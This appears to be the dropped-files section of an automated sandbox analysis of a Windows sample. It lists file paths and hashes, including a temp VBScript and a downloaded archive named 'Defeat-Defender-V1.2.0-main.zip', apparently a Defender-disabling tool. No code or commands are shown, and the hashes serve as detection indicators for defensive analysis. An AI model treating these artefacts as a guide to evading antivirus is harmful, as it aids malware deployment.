                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                38f7f4879c51009dc9f84850057aebe4

                                                                SHA1

                                                                4443b852f7c6b315a71769b11c9e28ee015f1fc8

                                                                SHA256

                                                                3aba0921b6c296f0810a627b591da9b7b4990a3a31c1d1f637498fe1e68797af

                                                                SHA512

                                                                9c243b3bb7d51e53d4f7fa94d4dceeda4105e984a0c3c7897903ca1b34c95ba8542be3f7435fa80d74bea928ff0d8886ff42347e0fd0e0ad36857a0177fe4251

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                d4c9c8c28ba4a1155b1183a610c51633

                                                                SHA1

                                                                7d27385a86f57b9a41a51b1657cc0905ee60ab14

                                                                SHA256

                                                                3fbd2a1d6753401fd407c1c68a7876b6a2700d70c26b13154d261402bd5d4aab

                                                                SHA512

                                                                72bf696674e1d0bc6295f12af2df0e4799b3f0f61cf9ed149301f884b9c24efe5397c1f7cdb35d974f114f99bd123d16c938f96113caefaa3e7494a304543e92

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57c9c8.TMP

                                                                Filesize

                                                                539B

                                                                MD5

                                                                01b76bb2ef606eacdeeb226c93018d99

                                                                SHA1

                                                                1d23e471c7740ecdd72cfd6ce23ae693ada71162

                                                                SHA256

                                                                e719fc5838b244f500c027f066592fcf3d48a40efbb647aa121112560942ebca

                                                                SHA512

                                                                d59fa864b40d377004daa237c6287635123c9e1b749daf643d9ebead55b35fc93c017140a97f469b5bdc18947c84e8161253e485eb2e36e63f45427ec0254932

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                Filesize

                                                                16B

                                                                MD5

                                                                6752a1d65b201c13b62ea44016eb221f

                                                                SHA1

                                                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                SHA256

                                                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                SHA512

                                                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                Filesize

                                                                11KB

                                                                MD5

                                                                ae1297bd78a96151a31441b7c0b739c5

                                                                SHA1

                                                                f51e426fa24c4a5110c1b0fa97764054445f3510

                                                                SHA256

                                                                cfd85495b4777cdcca0c25477dc0fd005ce2b1ff9f2358ae927b4d0b745f5355

                                                                SHA512

                                                                bae8b86bb971a433615ece0884ee8d08288de08bf250516d4e4efd1f3aaa68844169d072cdf60399e8b482805f5c851a420e23c8ad5c2849769433a4167e101f

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                Filesize

                                                                11KB

                                                                MD5

                                                                ab3d55530efeef3c5d17ce9e9b7aa25a

                                                                SHA1

                                                                96f5eb5875a1d192e5a3e9a3ea3b6b100c9c593c

                                                                SHA256

                                                                c0203ebe193aed3d73756558698dfe9c86a2d2863d5b126bda7011ae9710026c

                                                                SHA512

                                                                1bebd1a58010a77f396a6697f4d9aa8adb1be8087c885b41aad572763c087dc3b7174a167319b5fd9cc272e1617bcba90b0d75bdb3a7c672402e1dac5554e940

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                944B

                                                                MD5

                                                                05b3cd21c1ec02f04caba773186ee8d0

                                                                SHA1

                                                                39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

                                                                SHA256

                                                                911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

                                                                SHA512

                                                                e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                64B

                                                                MD5

                                                                052b68d98977d4f52cc6afabfa743b06

                                                                SHA1

                                                                63b671a71cc5ec6b76218b0094784a5e21e08e7f

                                                                SHA256

                                                                199ac916bb90b9b2107eb749d5c65411c387c7d59f0a2d19d17674983287116a

                                                                SHA512

                                                                e20517e1d3b755c17c617f9cbab3de19a4b29fc16a3422bbde30530130c2865173b85ee24e336b20c4706740250bc062f789d0c6989d4ed15c6f8527033693af

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                ea292e0d870c21833e86a33dbdbeb4b5

                                                                SHA1

                                                                1d4ea5bf2aa655df1a7dfe1542e8a0c11b10410b

                                                                SHA256

                                                                b06ce1c537b90fb95d640ec13aee0cccd4fcf225e2dde619cb3ac3def3ea8e78

                                                                SHA512

                                                                d6a7eb9de74196491f1f81cef9273b3259ffd2be51b68e17dd2fb336a7543b385ebe6d95cd57aeae9296395a51a8e3446ba14a2b8b938ab745d7df5c8e1deae2

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                944B

                                                                MD5

                                                                d0a4a3b9a52b8fe3b019f6cd0ef3dad6

                                                                SHA1

                                                                fed70ce7834c3b97edbd078eccda1e5effa527cd

                                                                SHA256

                                                                21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

                                                                SHA512

                                                                1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                944B

                                                                MD5

                                                                80707036df540b6657f9d443b449e3c3

                                                                SHA1

                                                                b3e7d5d97274942164bf93c8c4b8a9b68713f46f

                                                                SHA256

                                                                6651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0

                                                                SHA512

                                                                65e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                948B

                                                                MD5

                                                                75750301db717dee0ddce4939072ec41

                                                                SHA1

                                                                d4a763f4ced8ff5be9df24e0d6ec676a7a080527

                                                                SHA256

                                                                abfcadfc1dab687291dec5402f5472132f4d2460e85a498a37efa5ac9dc09888

                                                                SHA512

                                                                e02fbfc783aeb85a16422baf6df381b88415a89a29316695e48c1edb65745ec801759e276803207645d59b81e3ad38f584caad824772035ee6ce46c333f75ce3

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                948B

                                                                MD5

                                                                2afc7f8f972d80c756469f519957ebe3

                                                                SHA1

                                                                a2b08d1c68d7c26f52784aa22c1c02cf73453c4a

                                                                SHA256

                                                                fc8adf84ff2cdbcb64cfbe3e035b9d4286fa1169b052139c168393970bee86bf

                                                                SHA512

                                                                4d4a28cc652d1c57ebb92670f3474d41c645b3993086d9d132fb23444bbde4382993b50b2d4c919a5ab7307d53c770ad9869397ec5213eddfa84db2da0d1556e

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                948B

                                                                MD5

                                                                eb6bbad04121efc4b28aafcfb2098c9b

                                                                SHA1

                                                                874882a3749c41301505e95510f761491c465073

                                                                SHA256

                                                                bdd1eb4ef60661fd7570aa4f6454ffe1072f57d213dd7263f89dafceee0e5bd5

                                                                SHA512

                                                                7ade89430b42f124403449f4b8146ea4daad3bf87a53fe6aacdb28d759ad759ad6ea88db61723c1fa9c728d0d3c7aafa13527d15cf7149abbb4fa4fb4eb459d3

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                948B

                                                                MD5

                                                                b6c336e3b3cb2cd04d42baac1aa4aa0d

                                                                SHA1

                                                                35a943816f3e9cd596e91be92c4bdb1b05a42d88

                                                                SHA256

                                                                4518fb6ffb3f70be78cb243cac94fcf74d9c58d2e7bd8c510ebe696d3f81cb60

                                                                SHA512

                                                                42c4a8f07051ac7c00014ddaa0b0db50bdbcb49a30ae96803e37f3a566c100932367e0a50baead881509ae4a4d49c769513626c5015fe0a02d1d3ae22ca759f4

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                948B

                                                                MD5

                                                                67fc27fc887b927aeb2ff531b04c3c84

                                                                SHA1

                                                                a001b354b8d636a64ee2a519ca19dafb8e744a16

                                                                SHA256

                                                                a7ca81c6ea294d3450336418c895ab1774bd959e6b79b62716849e8c4607c25d

                                                                SHA512

                                                                8c8eab70b6c5d0bbbc78760b25ea6deb7d4221d03a6f680999f4cd02da330c1cc14b6c0a5e8e4f0ac5295d037fe7e71932360f552db85bc8bbe2e9dea30f23b6

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                64B

                                                                MD5

                                                                5caad758326454b5788ec35315c4c304

                                                                SHA1

                                                                3aef8dba8042662a7fcf97e51047dc636b4d4724

                                                                SHA256

                                                                83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                                                SHA512

                                                                4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                944B

                                                                MD5

                                                                fcbfea2bed3d0d2533fe957f0f83e35c

                                                                SHA1

                                                                70ca46e89e31d8918c482848cd566090aaffd910

                                                                SHA256

                                                                e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

                                                                SHA512

                                                                d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                64B

                                                                MD5

                                                                55d46f537381013a3b35f9ac7b1ca381

                                                                SHA1

                                                                3b6aed0a4b83bbcff9a4830ef36c050f1e5e9605

                                                                SHA256

                                                                f6e691fcc8f75da2a6c49f28d5db50699b5402bd9bde6a3d726a47a8a1a54e89

                                                                SHA512

                                                                4447f51dd568f973c83ebc192f887e2447322947015c8d21d3218ec3ef86084099dc583b359effd9b733efee9f1c0dca6544a1f7531d7080476e570662081d4a

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                944B

                                                                MD5

                                                                49c39329e38937c8e27f09fadb70c0f7

                                                                SHA1

                                                                958c29d3bbb82b4c85162e70d0a96d8c6f389283

                                                                SHA256

                                                                1a6a068d88a05119fc303cb10a417b655b243a1a3d9f89461aa51d97b9f99206

                                                                SHA512

                                                                1405b839ad6be92d81004c736592df210e97f44dbb4f0c63779370eabb1a04d8c663eb55c3de3f189e34d35446c08809af7555c881a86fd3b85fcdf544a8cbd1

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                948B

                                                                MD5

                                                                a0e27123ec2730bd5d89828fd6a41cc2

                                                                SHA1

                                                                d1099e93025598a470d6cc9c0549595e8f8e9a7f

                                                                SHA256

                                                                fda70f35a9cbde9e93461cd72d0c668f964d8b07e5c43322e47ed602ceb177a9

                                                                SHA512

                                                                b73fba4357362fa2057fe5216490da71958e1edb6fd08fe7cd99d214a8a1a5381ff304584c7969cedfb790170ecd65cbe96e006c5d2e41ceff587138ba244d31

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                948B

                                                                MD5

                                                                d70b0a49b2727a97cc322ea54d2a66c7

                                                                SHA1

                                                                57d984bd970307ad80665d97f5369ad644de8776

                                                                SHA256

                                                                bc38ea6605142cb9ec440231b665a5c5a53c499c7e25a77a94eb6491efdd2a65

                                                                SHA512

                                                                90790e506f7453a63d4915fb50c7694184c3bc5b836979d19c15a240c6145d9bbc33d393007f4b39a782e789f6259974a1824e79e960a64c5f8703e4797fdd0d

                                                              • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

                                                                Filesize

                                                                10KB

                                                                MD5

                                                                3e1f5eeae74491d8850ef2c8b03a9a3b

                                                                SHA1

                                                                0c02c9c2550107de6dd0eb740ac5668f292883c0

                                                                SHA256

                                                                66756c0edf3925de7bcb685385e2a4f0b854cffd796a9e90eb1ed064b1fb0e30

                                                                SHA512

                                                                7637f0807d88dbceeb68823a044583e2248ac1ba73c000da6560f94075635a27d15970df7e52f8315bdc2f1c45cff6f1ab7690e916b58307a533f8df24329c2a

                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdzjla14.qnm.ps1

                                                                Filesize

                                                                60B

                                                                MD5

                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                SHA1

                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                SHA256

                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                SHA512

                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                              • C:\Users\Admin\AppData\Local\Temp\tmp.vbs

                                                                Filesize

                                                                112B

                                                                MD5

                                                                9313d55e26ad30ddcbc046fe8013a21d

                                                                SHA1

                                                                a5712ce8864d7b0ca88b94c64226dfeb2221457f

                                                                SHA256

                                                                121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a

                                                                SHA512

                                                                77b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7

                                                              • C:\Users\Admin\Downloads\Defeat-Defender-V1.2.0-main.zip

                                                                Filesize

                                                                307KB

                                                                MD5

                                                                1d23efd21f4e61e620c7be5d70c66903

                                                                SHA1

                                                                3f7b34380e10912c6aaed833b378392a57d22b49

                                                                SHA256

                                                                9a6e38be267702f3b397fdc416dc2d0d520239dc8d3d983e353e0422ac7941fe

                                                                SHA512

                                                                4a657cc7ba2ed904c0742b504a0bdc685fb1c69b345ea9aef928ff0c2710fd17af42ca4d79d8055588372b43b9e953ff99ab4dea7ce07bbaf733f1b2a7495f46

                                                              • C:\Users\Admin\Downloads\Defeat-Defender-V1.2.0-main.zip:Zone.Identifier

                                                                Filesize

                                                                181B

                                                                MD5

                                                                affda83f3fadf6044e5c68100e9ed3f9

                                                                SHA1

                                                                71da30cbb01d3bee4028d333d61cf0dc72be67d6

                                                                SHA256

                                                                93ead31dd979c1a0627a4fc8a1a690d6a1a22b647d4a61487ccb88fdbe035da6

                                                                SHA512

                                                                db0b78824f31505cb176a9bc7a71bd67cbce617cb6a599dfd25be9e9173dacba8363de09f4bbd96c46b67d1027d9a5065bf08a1f2a39f06c6f0cec2986ed0a9f

                                                              • \??\pipe\LOCAL\crashpad_4880_YRLDGHZNDQRTWPMO

                                                                MD5

                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                SHA1

                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                SHA256

                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                SHA512

                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                              • memory/3900-560-0x000001CAC6940000-0x000001CAC6962000-memory.dmp

                                                                Filesize

                                                                136KB